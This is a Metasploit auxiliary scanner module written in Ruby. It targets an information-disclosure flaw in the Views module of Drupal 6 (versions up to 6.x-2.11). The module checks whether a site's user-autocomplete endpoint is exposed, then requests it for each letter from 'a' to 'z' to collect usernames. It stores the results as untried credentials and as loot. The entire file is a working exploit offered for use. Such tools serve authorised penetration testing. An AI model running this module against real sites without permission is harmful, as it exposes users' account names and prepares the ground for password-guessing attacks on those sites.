modules/auxiliary/scanner/http/drupal_views_user_enum.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::WmapScanServer
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Drupal Views Module Users Enumeration',
'Description' => %q{
This module exploits an information disclosure vulnerability in the 'Views'
module of Drupal, brute-forcing the first 10 usernames from 'a' to 'z'.
Drupal 6 with 'Views' module <= 6.x-2.11 are vulnerable. Drupal does not
consider disclosure of usernames as a weakness.
},
'Author' =>
[
'Justin Klein Keane', #Original Discovery
'Robin Francois <rof[at]navixia.com>',
'Brandon McCann "zeknox" <bmccann[at]accuvant.com>'
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://www.madirish.net/node/465'],
['URL', 'https://www.drupal.org/node/1004778'],
],
'DisclosureDate' => '2010-07-02'
))
register_options(
[
OptString.new('TARGETURI', [true, "Drupal Path", "/"])
])
end
def base_uri
@base_uri ||= normalize_uri("#{target_uri.path}/?q=admin/views/ajax/autocomplete/user/")
end
def check_host(ip)
res = send_request_cgi(
'uri' => base_uri,
'method' => 'GET',
'headers' => { 'Connection' => 'Close' }
)
unless res
return Exploit::CheckCode::Unknown
end
if res.body.include?('Access denied')
# This probably means the Views Module actually isn't installed
print_error("Access denied")
return Exploit::CheckCode::Safe
elsif res.message != 'OK' || res.body != '[ ]'
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Appears
end
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: (ssl ? 'https' : 'http'),
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user]
}.merge(service_data)
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
def run_host(ip)
# Check if remote host is available or appears vulnerable
unless check_host(ip) == Exploit::CheckCode::Appears
print_error("#{ip} does not appear to be vulnerable, will not continue")
return
end
print_status("Begin enumerating users at #{vhost}")
results = []
('a'..'z').each do |l|
vprint_status("Iterating on letter: #{l}")
res = send_request_cgi(
'uri' => "#{base_uri}#{l}",
'method' => 'GET',
'headers' => { 'Connection' => 'Close' }
)
if res && res.message == 'OK'
begin
user_list = JSON.parse(res.body)
rescue JSON::ParserError => e
elog('Exception encountered parsing JSON response', error: e)
return []
end
if user_list.empty?
vprint_error("Not found with: #{l}")
else
vprint_good("Found: #{user_list}")
results << user_list.flatten.uniq
end
else
print_error("Unexpected results from server")
return
end
end
results = results.flatten.uniq
print_status("Done. #{results.length} usernames found...")
results.each do |user|
print_good("Found User: #{user}")
report_cred(
ip: Rex::Socket.getaddress(datastore['RHOST']),
port: datastore['RPORT'],
user: user,
proof: base_uri
)
end
results = results * "\n"
p = store_loot(
'drupal_user',
'text/plain',
Rex::Socket.getaddress(datastore['RHOST']),
results.to_s,
'drupal_user.txt'
)
print_status("Usernames stored in: #{p}")
end
end